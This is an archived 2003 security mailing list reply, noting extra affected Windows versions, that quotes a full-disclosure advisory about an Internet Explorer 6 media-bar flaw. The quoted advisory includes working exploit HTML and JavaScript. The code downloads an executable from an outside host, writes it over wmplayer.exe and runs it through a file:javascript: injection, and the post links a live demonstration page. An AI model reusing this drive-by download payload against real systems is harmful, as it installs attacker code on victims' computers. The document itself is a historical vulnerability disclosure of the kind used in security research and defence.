lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <003001c37978$c8586ae0$670aa8c0@djj4v42ar4xx78>
From: info at djmegaworld.nl (Dj MegaWorld)
Subject: Re: Internet explorer 6 on windows XP allows exection of arbitrary code

Same problem occurs on windows 2000 and windows 2003 server...

Greetings,

Dj MegaWorld / Marius van Witzenburg

"It's the music... That never fades!"
Url: http://www.djmegaworld.nl/

----- Original Message -----
From: "jelmer" <jkuperus@...net.nl>
To: <bugtraq@...urityfocus.com>
Cc: <full-disclosure@...ts.netsys.com>
Sent: Friday, September 12, 2003 0:31
Subject: Internet explorer 6 on windows XP allows exection of arbitrary code


> Internet explorer 6 on windows XP allows exection of arbitrary code
>
> DESCRIPTION :
>
> Yesterday Liu Die Yu released a number series of advisories concerning
> internet explorer
> by combining on of these issues with an earlier issue I myself reported a
> while back
> You can construct a specially crafted webpage that can take any action on
a
> users system
> including but not limited to, installing trojans, keyloggers, wiping the
> users harddrive etc.
>
>
> TECHNICAL EXPLAINATION :
>
> Internet explorer 6 comes with a media sidebar in wich you can load and
play
> mediaclips
> without even leaving the browser. when you instruct the mediabar to load a
> file from an
> unknown host or the HTTP status returned by an existing host indicates an
> error
> this media bar displays an error page inside the media bar namely
>
> res://C:\WINDOWS\System32\browselc.dll/mb404.htm#path
>
> res URL's are treated as being in the "my computer zone" and are loaded
from
> the users filesystem
> perfect conditions for the issue I describe on
>
> http://www.mail-archive.com/full-disclosure@lists.netsys.com/msg06791.html
>
> To work. now all that is needed is a way to inject this exploit code into
> this page
> This method was graciously provided by Liu Die Yu as you can read on
>
> http://www.securityfocus.com/archive/1/336937/2003-09-08/2003-09-14/0
>
> Combining these issues we get something like :
>
> --snip--
>
> <textarea id="code" style="display:none;">
>
>     var x = new ActiveXObject("Microsoft.XMLHTTP");
>     x.Open("GET", "http://ip3e83566f.speed.planet.nl/1.exe",0);
>     x.Send();
>
>     var s = new ActiveXObject("ADODB.Stream");
>     s.Mode = 3;
>     s.Type = 1;
>     s.Open();
>     s.Write(x.responseBody);
>
>     s.SaveToFile("C:\\Program Files\\Windows Media
Player\\wmplayer.exe",2);
>     location.href = "mms://";
>
> </textarea>
>
> <script language="javascript">
>
>     function preparecode(code) {
>         result = '';
>         lines = code.split(/\r\n/);
>         for (i=0;i<lines.length;i++) {
>
>             line = lines[i];
>             line = line.replace(/^\s+/,"");
>             line = line.replace(/\s+$/,"");
>             line = line.replace(/'/g,"\\'");
>             line = line.replace(/[\\]/g,"\\\\");
>             line = line.replace(/[/]/g,"%2f");
>
>             if (line != '') {
>                 result += line +'\\r\\n';
>             }
>         }
>         return result;
>     }
>
>     function doit() {
>         mycode = preparecode(document.all.code.value);
>         myURL = "file:javascript:eval('" + mycode + "')";
>         window.open(myURL,"_media")
>     }
>
>
>     window.open("error.jsp","_media");
>
>     setTimeout("doit()", 5000);
>
>
> </script>
>
> --snip--
>
> error.jsp is a jsp page that consists of one line, namely
>
> <% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>
>
>
> DEMONSTRATION :
>
> A demonstration is provided at :
>
> http://ip3e83566f.speed.planet.nl/hacked-by-chinese/5.htm
>
>
> WORKAROUND :
>
> Disable active scripting or do "the sensible thing" and pick another
browser
> such as the
> excellent mozilla firebird.
>
>


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ